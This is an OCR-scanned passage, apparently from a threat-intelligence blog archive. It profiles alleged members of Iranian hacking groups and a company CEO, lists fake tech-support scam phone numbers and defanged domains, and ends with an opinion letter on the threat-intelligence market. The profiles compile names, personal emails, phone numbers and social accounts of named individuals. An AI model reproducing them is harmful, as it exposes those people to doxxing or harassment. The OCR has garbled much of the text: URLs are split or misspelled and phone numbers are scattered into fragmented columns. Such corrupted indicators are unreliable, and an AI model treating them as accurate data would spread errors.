Email: omid.ghaffarinia@gmail.com; 

plus.ashiyane@gmail.com; 

omid.ghaffarinia@alum.sharif.edu 

Phone: 091 2444 9002 

Web 

Site: 

http://alum.sharif.ir/ 

omid.ghaffarinia/; 

http://alum.sharif.ir/ 

omid.ghaffarinia/; 

http://omidplus.persiangig.com/; 

Social 

Media 

Accounts: 

https://plus.google.com/109226633947780718251; 

https:/ 

/plus.googl- 



e.com/109226633947780718251 

Personal Photos of Omid Ghaffarinia a.k.a Plus: 
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Sample Personal Photos from a Train Trip: 
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Handle: MagicCoder 
Email: MagicC0d3r@gmail.com 
Web Site: http://magiccoder.ir 


Handle: Mehdy007 

Email: mehdy007@hotmail.fr 

Web Site: http://mehdy007.persiangig.com 

Sample Sun Army Cover Art Photos: 
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ITSec Team a.k.a Amn pardazesh kharazmi a.k. 
Pooya Digital Security Group Members: 

Pejvak, M3hr@n.S, Am!rkh@n f Doosib, H4mid@Tm3l, 
R3dm0ve, Provider, ahmadbady 
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Sample Team Member Personally Identifiable 
Information: 


Name: Amin Shokohi 


Handle: Pejvak 

Email: pejv4k@yahoo.com 

Web Site: http://pejv4k.persiangig.com; 
http://pejv4k.110mb.com 

Handle: Mehr@n.S 

Email: M3hran.S@gmail.com 

Sample Network Infrastructure Reconnaissance: 

http://itsecteam.com/ 

Social Network Graph of Sun Army Team Members 
including ITSec Team Members and the Mersad Co. 
company: 
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Name: Mohammad Sagegh Ahmadzadegan 
Handle: Nitrojen26 

Email: nitr0jen26@asia.com; Nitrojen26@yahoo.com; 
me@sadahm.n et 

Web Site: hxxp://sadahm.com 

Social Media Accounts: https://twitter.com/nitrojen26 

Sample Personal Photos of Mohammad Sagegh 
Ahmadzadegan a.k.a Nitrojen26: 
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Sample Mersad Co. Company Logo: 

Sample Network Infrastructure reconnaissance: 
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hxxp://mersad.co/ - 188.40.112.196 
hxxp://mersadco.ir 

Mohammad's life has strongly tied with programming. After 
graduation of Computer Engineering, he studied IT 

(E-Commerce) for his Master to know more about the 
relation of business and technology. You can find some large 

scale software projects managed by him like Iran's SOC, 
SDIDS, Jolfa Vulnerability DB and etc. Now he is a university 

lecturer and also CEO of Mersad Co. and one of TKJ Co. 
consultants. Mohammad is here to help you how to manage 

a good develop team and guide you to have better usage of 
technology to achieve your business goals. 


Personal Photos of Mersad Co.CEO Mohammad 
Hamidi Esfahani: 
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Personally Identifiable Information regarding Mersad 
Co. Company CEO Mohammad Hamidi Esfahani: 

Name: Mohammad Hamidi Esfahani 

Email: 'm.hamidi.es@gmail.com 

Phone: 0913-304-7591 

Web Sites: http://www.mohammadhamidi.ir/ 
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Social Media Accounts: 

https://www.facebook.com/mohammad.hamidi; https://twit 
ter.com/haj _mamed; 

https://github.com/mohammadhamidi; 
https://medium.eom/@haj _mamed; 
https://medium.eom/@haj _mamed; 

https://plus.google.com/-i-mohammad hamidi Esfahani; 

Sample Mersad Co. Personal Company Photos: 
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Stay tuned! 

1. https://ddanchev.blo as pot.com/2015/Q7/assessin a- 
comouter-network-operation_29.html 

2. https://www.fbi. a ov/wanted/cvber 

3. https://www.fbi. a ov/wanted/cvber/ahmad-fathi 

4. https://www.fbi. a ov/wanted/cvber/hamid-firoozi 

5. https://www.fbi. a ov/wanted/cvber/amin-shokohi 

6. https://www.fbi. a ov/wanted/cvber/mohammad-sade ah- 
ahmadzade a an 
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7. https://www.fbi. a ov/wanted/cvber/omid- a haffarinia 

8. https://www.fbi. a ov/wanted/cvber/sina-keissar 

9. https://www.fbi. a ov/wanted/cvber/nader-saedi 
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Historical OSINT - A Portfolio of Fake Tech Support 
Scam Domains - An Analysis (2019-01-16 16:03) 

The Rise of Tech Support Scams? You wish. 

































The general availability of Tech Support Scams can be 
attributed to an overall increase in the standardization 

of social engineering type of fraudulent and rogue scams 
which can be greatly attributed to the overall availability of 

affiliate-network type of fraudulent revenue-sharing 
schemes. 

Keep reading. 

What can be best described as today's modern Tech Support 
Scam can be best described as a logical copycat evolution 

between the well-known Scareware also known as Fake 
Security Software fraudulent and malicious monetization 

scheme largely affecting millions of users globally thanks to 
the overall availability of affiliate-network type of 

revenue-sharing schemes. 
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Among the key distribution and propagation tactics 
including spam and phishing campaigns including instant 

messaging and black hat SEO largely relying on traffic 
acquisition on volume-basis for the purpose of converting 
the 

traffic to potential fraudulent customers and victims. 

Taking into consideration that the key traffic acquisition 
tactics remain the primary growth factor of the Tech 


Support Scam market segment among the key business 
model and "talent acquisition" tactics remain the actively 

outsourcing to custom-labeled call-centers and data mining 
operators including the active utilization of brand-jacking 

including possible typosquatting-based type of campaigns 
including active visual-social engineering type of cam¬ 
paigns. 

Are Tech Support Scams making a come-back? How can we 
best proceed to estimate the true cost and associ¬ 
ated actionable threat intelligence courtesy of Tech Support 
Scams. Keep reading! 

In this Intelligence brief I'll provide actionable intelligence 
on a diverse portfolio of Fake Tech Support scam domains 

and discuss in-depth the tactics techniques and procedures 
of the cybercriminals behind it with the idea to success¬ 
fully disrupt and shut down the operations of the rogue 
operations related to this particular Intelligence brief. 

Sample portfolio of fake and fraudulent Tech- 
Support Scam phone numbers: 

1-855-525-4632 

1-855-482-6468 

1-866-537-7060 

1-888-714-0027 


1-877-895-8043 



1-844-257-9397 


1-844- 

1-844- 

1-877- 
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1-877- 

1-844- 

1 - 888 - 

1-844- 

1-855- 

1 - 888 - 

1-844- 

1 - 888 - 

1 - 888 - 

1-844- 

1-877- 

1-844- 

1-844- 


-5553 

-2991 

-9880 

-7626 

-3940 

-4248 

-1353 

-5040 

-6545 

-3791 

-4990 

-4958 

-3561 

-8089 

-9930 

-7017 


815 

307 

354 

489 

211 

496 

500 

998 

264 

307 

691 

484 

850 

253 

824 

413 


1-888-941-3234 


1-888-683-4880 


1-800-450-1910 

1-844-305-2498 

1-866-285-0655 

1-800-777-0770 

1-877-554-1924 

1-877-910-7192 

1-877-777-2804 

1-844-548-6474 

1-877-581-8998 

1-844-307-6883 

1-855-639-4698 

1-888-223-4112 

310 

1-888-547-4914 

1-844-307-2994 

1-888-395-6629 

1-866-389-3575 

1-844-856-1333 


1-800-964-8718 



1-800-898-6987 


1-844-822-0875 

1-888-607-7011 

1-877-759-9789 

1-844-313-6004 

1-844-851-4610 

1-844-324-6281 

1-844-860-1112 

1-844-870-5033 

1-855-661-6640 

1-800-051-3725 

1-844-347-0741 

1-877-227-0785 

1-833-224-8222 

1-833-248-4555 

1-833-300-5666 

1-833-334-8999 

1-833-335-1333 

1-833-336-8633 


1-833-337-6555 



1-833-339-7733 


1-833-414-5500 

1-833-414-8800 

1-833-432-7770 

1-833-543-8896 

1-833-706-4400 

1-833-706-8800 

1-833-776-8324 

1-833-783-7700 

1-833-802-2200 

1-833-863-6600 

1-833-870-9054 

1-833-870-9055 

1-833-995-1999 

1-844-200-1625 

1-844-200-1653 

1-844-200-1712 

1-844-200-1713 

1-844-200-1716 


1-844-200-1751 



1-844-200-1859 


1-844- 

1-844- 

1-844- 
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1-844- 

1-844- 

1-844- 

1-844- 

1-844- 

1-844- 

1-844- 

1-844- 

1-844- 

1-844- 

1-844- 

1-844- 

1-844- 


-1890 

-2560 

-2574 

-2578 

-2629 

-2650 

-2870 

-4091 

-4098 

-4099 

-4116 

-4203 

-4243 

-4246 

-4249 

-4323 


200 

200 

200 

200 

200 

200 

200 

200 

200 

200 

200 

200 

200 

200 

200 

200 


1-844-200-4379 


1-844-200-4473 


1-844-200-4474 

1-844-200-4485 

1-844-200-4486 

1-844-204-9149 

1-844-212-8344 

1-844-229-6999 

1-844-237-2411 

1-844-238-9924 

1-844-241-5999 

1-844-241-7912 

1-844-248-2909 

1-844-252-6111 

1-844-284-8623 

1-844-305-5027 

312 

1-844-307-1915 

1-844-313-2994 

1-844-313-6006 


1-844-313-9175 



1-844-318-9400 


1-844-326-3137 

1-844-350-4289 

1-844-352-9401 

1-844-366-5999 

1-844-370-2707 

1-844-371-8869 

1-844-378-6561 

1-844-378-6777 

1-844-378-6888 

1-844-400-9542 

1-844-411-4922 

1-844-422-5281 

1-844-428-3630 

1-844-470-9939 

1-844-489-6111 

1-844-539-5778 

1-844-539-5784 

1-844-542-4107 


1-844-554-2336 



1 - 844 - 556-2898 


1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

1 - 844 - 

313 
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1 - 844 - 


-7758 

-1757 

-4082 

-2888 

-0202 

-8256 

-9881 

-2555 

-8666 

-1695 

-9666 

-6888 

-2565 

-8730 

-9511 

-8372 


556 

558 

573 

577 

594 

613 

622 

651 

653 

656 

662 

665 

675 

675 

693 

712 


1 - 844 - 715-0111 


1 - 844 - 719-6166 


1 - 844 - 724-6592 

1 - 844 - 730-7111 

1 - 844 - 743-6449 

1 - 844 - 750-6258 

1 - 844 - 755-0510 

1 - 844 - 775-6410 

1 - 844 - 775-8407 

1 - 844 - 792-2887 

1 - 844 - 800-6856 

1 - 844 - 801-5941 

1 - 844 - 805-0111 

1 - 844 - 807-4555 

1 - 844 - 811-1823 

1 - 844 - 816-7270 

1 - 844 - 843-5125 

1 - 844 - 855-9343 

1 - 844 - 858-5647 

1 - 844 - 872-1286 


1 - 844 - 873-1596 



1 - 844 - 885-1444 


1 - 844 - 891-1947 

1 - 844 - 891-4879 

1 - 844 - 895-3281 

1 - 845 - 205-9081 

1 - 845 - 233-6465 

1 - 850 - 583-3302 

1 - 855 - 203-6745 

1 - 855 - 205-4077 

1 - 855 - 269-5777 

1 - 855 - 278-5777 

314 

1 - 855 - 287-5222 

1 - 855 - 297-8444 

1 - 855 - 302-8333 

1 - 855 - 307-6690 

1 - 855 - 307-6697 

1 - 855 - 325-1775 

1 - 855 - 336-7111 


1 - 855 - 372-4111 



1 - 855 - 374-9888 


1 - 855 - 382-4333 

1 - 855 - 389-2999 

1 - 855 - 389-4333 

1 - 855 - 390-1666 

1 - 855 - 393-4537 

1 - 855 - 400-5988 

1 - 855 - 428-2297 

1 - 855 - 433-5111 

1 - 855 - 441-7442 

1 - 855 - 441-7646 

1 - 855 - 442-4430 

1 - 855 - 490-1999 

1 - 855 - 490-3222 

1 - 855 - 501-3222 

1 - 855 - 534-8622 

1 - 855 - 558-6111 

1 - 855 - 633-1666 

1 - 855 - 676-6410 


1 - 855 - 687-6111 



1 - 855 - 697-5333 


1 - 855 - 718-9786 

1 - 855 - 755-0999 

1 - 855 - 844-8599 

1 - 855 - 937-4376 

1 - 855 - 955-2511 

1 - 866 - 202-1086 

1 - 866 - 215-1667 

1 - 866 - 217-8834 

1 - 866 - 217-8835 

1 - 866 - 218-3112 

1 - 866 - 218-3116 

1 - 866 - 249-7329 

1 - 866 - 279-9569 

1 - 866 - 281-2116 

1 - 866 - 338-7786 

1 - 866 - 343-8297 

1 - 866 - 389-1479 

1 - 866 - 450-3079 


1 - 866 - 497-4002 



1 - 866 - 511-7594 


1 - 866 - 625-5558 

315 

1 - 866 - 626-3808 

1 - 866 - 664-7164 

1 - 866 - 841-9124 

1 - 866 - 847-7743 

1 - 877 - 211-2480 

1 - 877 - 217-5947 

1 - 877 - 219-1029 

1 - 877 - 219-1485 

1 - 877 - 219-1996 

1 - 877 - 219-5966 

1 - 877 - 220-5017 

1 - 877 - 220-6098 

1 - 877 - 220-8783 

1 - 877 - 220-9321 

1 - 877 - 220-9962 

1 - 877 - 221-1366 


1 - 877 - 221-8289 



1 - 877 - 224-2895 


1 - 877 - 244-0727 

1 - 877 - 264-2122 

1 - 877 - 268-9059 

1 - 877 - 268 - 9059 - 

1 - 877 - 293-4440 

1 - 877 - 393-8186 

1 - 877 - 396-6777 

1 - 877 - 433-3061 

1 - 877 - 469-2140 

1 - 877 - 503-7614 

1 - 877 - 509-8343 

1 - 877 - 510-5544 

1 - 877 - 691-3469 

1 - 877 - 750-7842 

1 - 877 - 818-5969 

1 - 877 - 824-9312 

1 - 877 - 843-3339 

1 - 877 - 863-4795 


1 - 888 - 202-8995 



1 - 888 - 206-1755 


1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 
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1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 


-7130 

-0673 

-9250 

-4021 

-7642 

-4154 

-9998 

-1966 

-2902 

-9401 

-4119 

-4578 

-5014 

-6132 

-6033 

-9055 


209 

210 

210 

223 

223 

228 

228 

231 

232 

243 

244 

244 

244 

244 

258 

258 


1 - 888 - 267-7999 


1 - 888 - 279-3119 


1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

317 
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-0989 

-4330 

-0646 

-4972 

-4985 

-7042 

-5842 

-7391 

-8777 

-1924 

-3064 

-7633 

-4666 

-9666 

-9389 

-3226 

-6867 


287 

300 

302 

308 

308 

309 

316 

316 

316 

325 

331 

335 

346 

351 

372 

384 

403 


1 - 888 - 412-7333 


1 - 888 - 423-3886 

1 - 888 - 440-3005 

1 - 888 - 450-3444 

1 - 888 - 501-9477 

1 - 888 - 505-6572 

1 - 888 - 521-0529 

1 - 888 - 526-7488 

1 - 888 - 530-7555 

1 - 888 - 545-9220 

1 - 888 - 552-5210 

1 - 888 - 554-6480 

1 - 888 - 554-8205 

1 - 888 - 554-8266 

1 - 888 - 558-2612 

1 - 888 - 589-7758 

1 - 888 - 598-7976 

1 - 888 - 621-0834 

1 - 888 - 651-5889 


1 - 888 - 652-1304 



1 - 888 - 696-0666 


1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 
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1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 

1 - 888 - 


-7333 

-9143 

-0599 

-0627 

-5424 

-2529 

-7120 

-5441 

-9985 

-1126 

-8356 

-3813 

-4011 

-9789 

-9364 

-9798 


728 

728 

799 

801 

801 

802 

802 

804 

839 

843 

858 

870 

876 

879 

881 

883 


1 - 888 - 884-4139 


1-888-884-6349 


1-888-885-1701 

1-888-885-4967 

1-888-885-8695 

1-888-886-9457 

1-888-887-8691 

1-888-917-5333 

1-888-944-6229 

1-888-965-8445 

1-925-526-4637 
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Sample portfolio of Fake Tech Support Sea 
Domains: 

hxxp://0120-hfjkahgfu-238.cf 
hxxp://l-800-my-apple.org 
hxxp://lserversu pport.com 
hxxp://2serversu pport.com 
hxxp://3serversu pport.com 
hxxp://3stepremoval.com 
hxxp://4serversu pport.com 



hxxp://5serversu pport.com 
hxxp://6serversu pport.com 
hxxp://7serversu pport.com 
hxxp://8serversu pport.com 
hxxp://9 inch monster, us 
hxxp://9serversu pport.com 
hxxp://l lserversupport.com 
hxxp://2 2serversupport.com 
hxxp://24-7 helpline.co.uk 
hxxp://24hour-apple-su pport.org 
hxxp://24tech help.com 
hxxp://24x71 ivesolution.com 
hxxp://33host.net 
hxxp://33serversupport.com 
hxxp://44serversu pport.com 
hxxp://55serversupport.com 
hxxp://66serversupport.com 
hxxp://77serversupport.com 
hxxp://85dffas614fas.xyz 
hxxp://88serversupport.com 



hxxp://99 printerservice.net 

hxxp://99serversupport.com 

hxxp://99techsol utions.com 

hxxp://lllinstallsecuritysupport.info 

hxxp://lllonlineerrorreport.info 

hxxp://l llserversupport.com 

hxxp://lllwebsecurity.info 

hxxp://222installsecuritysupport.info 

hxxp://222onlineerrorreport.info 

hxxp://2 2 2serversupport.com 

hxxp://222websecurity.info 

hxxp://247fasttechsu pport.com 

hxxp://247 helpnumber.com 

hxxp://247officecom-setup.us 

hxxp://247su pport-number.com 

hxxp://247support.co 

hxxp://247troubleshooting.club 

hxxp://333installsecuritysupport.info 

hxxp://333onlineerrorreport.info 

hxxp://333serversu pport.com 



hxxp://333websecurity.info 
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HOME ABOUT US YAHOO CUSTOMER SERVICE YAHOO PHONE NUMBER SITEMAP 


YAHOO PHONE NUMBER SUPPORT : RESOLVE YAHOO MAIL TECHNICAL ERRORS WITH THE HELP OF 

EXPERTS 

Yahoo is a renowned name all across the globe and has got one of the biggest customer bases in the world There are millions of people enioywtg the service of yahoo and using 
thetr email service to get along with their day to day fobs Yahoo's email sennet is undoubtedly one of the most favorite email service among users because of the different add on 
features that accompanies the email service which is not available anywhere else Yahoo vows to present their customers with the best of services possible and always strive to 
brmg out the best among the employees But unfortunately there are times when the customers face issues with the email service and are faced with different technical glitches 
ranging from simple to complex ones that are not possible for the customers to solve on their own That is when they seek for a technical guidance and yahoo customer support 
comes into the picture Yahoo customer servlet has been working for years 24*7 every day of the year so that the customers enjoy an uninterrupted and smooth service from yahoo 
The professionals working in Yahoo customer service are energetic people very passionate about their job They are keen on helping people Being certified professionals they have 
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Computer Repair Services USA 

Call 1-877-220-5550 toll-free number to access best computer repair services 
in USA. We have Expert & Trained technician to help you 24/7 With any 
Computer related issues. 
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SUPPORT FOR MSN BILLING 
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that are available 24X7 to cater to all your billing related problems. 


Toll Free : 1-877-701-2611 


98 % Customer Satisfaction 
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hxxp://windows-alert.online 

hxxp://windows-alerts.online 

hxxp://windows-blue-screen-crash.xyz 

hxxp://windows-bug.site 

hxxp://windows-corrupted-browser-not-secu re-call- 
support. info 

hxxp://windows-error.co 

hxxp://wi ndows-errorx.com 



hxxp://windows-firewall-security-alert-error-found5.info 


hxxp://windows-has-detected-some-suspicious-activity-from- 

your-ipqw.in 

hxxp://windows-has-detected-some-suspicious-activity- 

fromyourcomputer.com 
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hxxp://wi ndows-helplines.com 

hxxp://windows-kernal-warning-error-found-diskread- 

error.com 

hxxp://windows-security-alert-mal ware-found-call- 
support. info 

hxxp://windows-security-alert-system-not-safe-call- 

support.info 

hxxp://windows-security-alert-system-not-safe-plese-call- 

support.info 

hxxp://windows-security-alert-virus-found-call-support.info 

hxxp://windows-security-center-2236.info 

hxxp://windows-server-error.info 

hxxp://windows-server-warning.info 

hxxp://windows-server-warning.us 

hxxp://wi ndows-support-me.com 

hxxp://windows-support.windowshelp.support 


hxxp://windows-system-587632.us 
hxxp://windows-system-alert.info 
hxxp://windows-system-error.us 
hxxp://wi ndows-technical-support.com 
hxxp://wi ndows-techsupport.com 
hxxp://wi ndows-threat.com 
hxxp://windows-virus-alert-risk.online 
hxxp://wi ndows-warning-error-found.com 
hxxp://wi ndows.technical-care.com 
hxxp://windowsalerts.xyz 
hxxp://windowscan page.on line 
hxxp://windowscan page, website 
hxxp://windowsecuritycounsel.online 
hxxp://wi ndowserrorhelps.com 
hxxp://wi ndowserrorsalert.com 
hxxp://windowshelp.support 
hxxp://wi ndowsisnotgenuine.com 
hxxp://wi ndowslivemailcustomerservice.com 
hxxp://wi ndowslivemailsupport.net 
hxxp://wi ndowslivetechsupport.com 



hxxp://windowsmicrosofts.xyz 

408 

hxxp://windowssecurity-center-2 999. info 

hxxp://windowsserverl02082308328.xyz 

hxxp://wi ndowssupportnumbers.com 

hxxp://wi ndowssupportphonenumber.com 

hxxp://wi ndowstechnicalsupportnumbers.com 

hxxp://wi ndowstechsupportphonenumber.com 

hxxp://wi ndowsupport.ulcraft.com 

hxxp://windowsupportaustralia.xyz 

hxxp://wi ndowsupporthelp247.com 

hxxp://wi ndowsvirusnotification.com 

hxxp://wi ndstream.su pportno.com 

hxxp://windsupportcarel0.xyz 

hxxp://wi nprotechnologies.com 

hxxp://winsec.biz 

hxxp://wi nsurftechnology.com 

hxxp://wi ntechassist.com 

hxxp://wizxpert.com 

hxxp://wordfictionll.info 



hxxp://world webhelper.com 

hxxp://worldwidewebb.in 

hxxp://wormsupportl.info 

hxxp://wormsupport2.info 

hxxp://wormsupport3.info 

hxxp://wormsupport4.info 

hxxp://wormsupport5.info 

hxxp://wormsupport.info 

hxxp://wormsupports.info 

hxxp://wqeasfas.xyz 

hxxp://wruxqo-atixin.xyz 

hxxp://www-mcafee-com-acti vate.com 

hxxp://www-norton-com-setup.com 

hxxp://www-su pport.net 

hxxp://wwwhel pnumber.co.uk 

hxxp://wwwmcafeeacti vate.com 

hxxp://wwwmcafeecomactivate.co 

hxxp://wwwoasisi nfosolutionin.OOOwebhostapp.com 
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hxxp://wwwofficecomsetup.co 

hxxp://wwwofficecomsetup.net 

hxxp://wwwofficecomsetup.xyz 

hxxp://x62y.com/8n9jd/index.php 

hxxp://xboxhel pi ine.com 

hxxp://xboxportforwardi ng.com 

hxxp://xdebugging.club 

hxxp://xerox. printersupportaustralia.com 

hxxp ://xerox. printersupportca.com 

hxxp://xerox.printersupportnumbercanada. 

hxxp://xientsu pport.com 

hxxp://xurnya-zlysifu.xyz 

hxxp ://yahoo-customer-care.co.uk 

hxxp://yahoo-customer-service.org 

hxxp://yahoo-customer-service.us 

hxxp ://yahoo-service-nu mber.com 

hxxp://yahoo-su pports.com 

hxxp ://yahoo-yahoomai I.com 

hxxp ://yahoo.austral iaemailsupport.com 

hxxp ://yahoo. klantenservicenederland.nl 



hxxp://yahoo. numberireland.com 
hxxp://yahoo.supportau.com.au 
hxxp://yahoo.supportaustralia.com.au 
hxxp://yahoo.supportnumberaustralia.com.au 
hxxp://yahoo.tech nicalsupportcontact.net 
hxxp://yahoocontact. weebly.com 
hxxp ://yahoocontactnu mber.co.uk 
hxxp://yahoocustomercare.us 
hxxp://yahoocustomerservice.co.uk 
hxxp://yahoocustomerservice.org 
hxxp://yahoocustomerservicephonenumber.us 
hxxp ://yahoocustomerservices. net 
hxxp ://yahooservice.on line 
hxxp://yahoosu pporstaustralia.blogszino.com 
hxxp://yahoosu pport.blogszino.com 
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hxxp://yahoosu pport.customerhelpusa.com 
hxxp://yahoosu pportau.skyrock.com 
hxxp://yahoosu pportaustralia.com.au 
hxxp://yahoosu pportcenter.com 



hxxp://yahoosu pporthelp.com 

hxxp://yahoosu pportnumber.com.au 

hxxp://yahoosu pportnumberau.wordpress.com 

hxxp://yahoosu pporttech.com 

hxxp://yahootechsupport.site.pro 

hxxp://ydeveloper.com 

hxxp://y ippeetech.co.uk 

hxxp://y mailcustomerservice.com 

hxxp://yournetworkreports.xyz 

hxxp://you rpcassistant.com 

hxxp://you rtechbay.com 

hxxp://youtubemail.info 

hxxp://youworldtrips.online 

hxxp://ysence.com 

hxxp://ysu pportnumber.com 

hxxp://z2s-microsoft.info 

hxxp://za kazeniepoprawa.com 

hxxp://zeus-virus-caused-system-corrupti on-contact, info 

hxxp://zeusalert-l.xyz 

hxxp://zeusalert-2.xyz 



hxxp://zeusalert-3.xyz 

hxxp://zeusalert-4.xyz 

hxxp://zeusalert-5.xyz 

hxxp://zeusalert-6.xyz 

hxxp://zeusalert-7.xyz 

hxxp://zeusalert-9.xyz 

hxxp://zeusalert-10.xyz 

hxxp://zeusalert-ll.xyz 

hxxp://zeusalert-12.xyz 

hxxp://zeusalert-13.xyz 

hxxp://zeusalert-14.xyz 

hxxp://zeusalert-15.xyz 

hxxp://zeuswin21147.in 

hxxp://znetworks.net 

hxxp://zoneala rmantivirussupport.com 

hxxp://zumbalamsada.xyz 

hxxp://zy ngahelp.com 

Stay tuned for the updated portfolio of Fake Tech Support 
Scams to be published anytime soon! 
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The Threat Intelligence Market Segment - A Complete 
Mockery and IP Theft Compromise - An Open Letter 

to the U.S Intelligence Community (2019-01-24 19:25) 

I recently came across to the most recently published 

[l]DoD Cyberspace Strategy 2018 which greatly 
reminded me 

of a variety of resources that I recently took a look at in terms 
of catching up with some of the latest cyber warfare 

trends and scenarios. Do you want to be a cyber warrior? Do 
you want to "hunt down the bad guys"? Watch out - 

Uncle Sam is there to spank the very bottom of your digital 
irrelevance. How come? 

It appears that the U.S is re-claiming back the dominance 
over the "communication channel" using a variety 

of real-life oriented cyber threats including referencing and 
citing security researchers and NGOs (Non-Profit 

Organization) as potential threats. Takes you back - doesn't 
it? If it's going to be massive it better be good. 

It's been several years since I last posted a quality update 
following my [2]disappearance and possible kidnapping 

attempt circa 2010. What really took place during that 
period of time? The rise of ransomware? The rise of Tech 

Support Scams? Yet another botnet currently spreading In 
The Wild? A market-driven buzz-word generation? 


Take that - ransomware is there to take care, hundreds of 
thousands of supposedly relevant lOCs (Indicators of 

Compromise) TTPs (tactics techniques and procedures) 
discussed to the bottom of your PR-relevant online presence. 

The Rise of the Threat Hunter job career opportunity 
basically empowering with you with the almighty skills to 
"track 

down" and "shut down" the bad guys? You wish - Uncle Sam 
is always there to take care. 

Let's discuss the Threat Intelligence market segment and 
offer an in-depth discussion on its inner working in¬ 
cluding a possible discussion on the Threat Intelligence 
market segment in today's modern Intelligence Community 

successfully realizing the consequences of what was once a 
proprietary network known as the Internet - today's 
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modern cyber warfare operational battlefield. 

Many of my blog readers are familiar with my work 
throughout the years however what you might not be aware 
of 

is the fact that throughout the 90's I used to pioneer the 
position of Technical Collector in the context of processing 

hundreds of malicious and user-friendly Trojan Horses also 
known as Remote Backdoors what would be later on 


described as Remote Access Tools through my hacker 
enthusiast years as an independent contractor and novice 

hacker working with the market-leading LockDownCorp anti¬ 
trojan horse software including leading to what would 

be later on better described as the foundations of the Threat 
Intelligence market qualitative Technical Collection 

including the very basics of the foundations of CYBERINT. 

Let's discuss in-depth the current state of the Threat 
Intelligence market segment including an in-depth discus¬ 
sion on the Threat Intelligence market segment in the 
context of today's modern U.S Intelligence Community. 

• Indicators of Compromise - the vary basics of 
formulating a new buzz-word for what was once a 
proprietary- 

term coined by the Intelligence Community to populate and 
disseminate actionable nation-state Cyberspace 

data to a variety of defensive and offensive Cyber Warfare 
Units can be best described as a New Age in the 

area of responsive and proactive OSINT type of acquisition 
methodologies that can be best described as a new 

way to acquire leaked and potentially data-and-resource 
exposure in a variety of automated ways. Generalizing 
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the very basics of the Threat Intelligence market segment in 
the context of potential Indicators of Compromise leaks can 



be best tackled in a way of offering central repositories 
including "government-free" access including 

a nation-state Early Warning System for potential Cyberspace 
threat data including a variety of Indicators of 

Compromise to prevent wide-spread data and information 
leaks further protecting the U.S Government from 

current and emerging threats. 

• Corporate Sector Data Mining Should Considered - 

what was once best known as "conducting cyber espionage 

through botnets" including the conducting of "cyber 
espionage through data mining of malware-infected corpo¬ 
rate networks" can be best described as today's proposed 
central Incident Response based central-repository 

empowering the U.S Intelligence Community with the 
necessary data and expertise to stay ahead and act upon 

current and emerging cyber threats. 

• Private Sector Cooperation and the "You Wish" 
mentality - the general assumption that the private sector 
will continue to cooperate and empower the U.S Intelligence 
Community with the necessary data information and 

knowledge should be considered a wrong approach on the 
U.S Intelligence Community's way to further protect 

the U.S national infrastructure including the proactive 
response to current and emerging cyber threats. What 

can be best done to further protect the U.S Government from 
current and emerging threats can be best de- 



scribed as a modern central-repository of "government-free" 
access based Cyber Threat Data type of platform. 

• Slicing the Threat on Pieces Should be Ignored - 

What can be best described as the process of slicing the 
threat 

"on pieces" is today's modern World of PR agencies and 
Threat Intelligence market segment intermediaries 

including the active labeling of a particular group of interest 
or an individual as a separate entry leading to an 

overall mis-confusion in the context of actually providing 
actionable Threat Intelligence to the U.S Intelligence 

Community that could ultimately better protect the U.S 
National Infrastructure. With the mainstream media 

continuing to raise the buzz around popular terms and newly 
coined cyber threat actor groups in the face of the 

rise of the advanced persistent threat media-buzz generating 
initiative it should be clearly noted that the overall 

irrelevance of labeling a specific cyber threat actor in the 
public domain should be considered as an irrelevant 

exercise in the broad context of providing the U.S 
Intelligence Community with the necessary data information 

and knowledge to stay ahead of current and emerging cyber 
threats. 

• Tactics Techniques and Procedures Should Be Buzz- 
Word Ignored - The very basics of coining a term term 



for the purpose of describing what can be best described as a 
general cyber threat methodology known as 

qualitative assessment should be considered as a possible 
flag raising operation that should be considered as 

a possible source for mis-confusion in terms of the broader 
context of discussing and reacting to current and 

emerging cyber threats. 

• The Rise of the "Threat Hunter" Cyber Security 
Career Position Is Already Causing Headaches - The 

rise of 

the "Threat Hunter" career position can be best described as 
a complete failure to understand the basics that 

drive today's modern Cyber Warfare Team including possible 
defensive and offensive Cyber Warfare Units and 

Cyber Operations Groups. With everyone "interested" in 
becoming a Cyber Warrior including a possible "Threat 

Hunter" it should be noted that the over-supply of private- 
sector companies stealing revenue from Uncle Sam 

for the purpose of enriching and disseminating actionable 
Threat Intelligence is overly increasing resulting in 

the overall demise of what was once a proprietary technology 
and know-how in the hands of a few that truly 

grasped the market and its potential successfully serving the 
needs of the U.S government for years to come. 

• The Rise of Secondary Markets for lOCs Should 
Provide "Government-free" Access - The general over- 



supply 


of market-segment driven repositories of actionable Threat 
Intelligence data should be greatly attributed to a 

variety of factors including the rise of the Threat Intelligence 
market segment and should be considered as a 

way for the U.S Intelligence Community to clearly seek a 
technical and potentially market-segment relevant way 

to populate a potential Cyber Threats data-base using public 
and proprietary sources with a clear "government- 

free" access in mind. 
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Current Proposals to U.S Intelligence Community in Terms of 
Threat Intelligence and Nation-State Actors: 

• Ousted Activity - Taking into consideration the fact that 
on the majority of occasions the majority of quality 

Threat Intelligence type of data is publicly obtainable using a 
variety of public and potentially proprietary sources 

is should be considered feasibly possible for the U.S 
Intelligence community to build manage and operate a 

proactive-based Cyber Threats anticipating platform 
including a possible Early Warning Based type of OSINT- 

capable system able to anticipate and act upon current and 
emerging threats with a possible cluster-based 


type of data mining and information processing capabilities 
potentially serving the needs of the U.S Intelligence 

Community. 

• Government-free Access - The very notion that an 
Indian-based company will successfully manage launch and 

operate a Threat Intelligence business should be largely 
ignored for the very sake of figuring out a way to ob¬ 
tain access to a particular company's Threat Intelligence data 
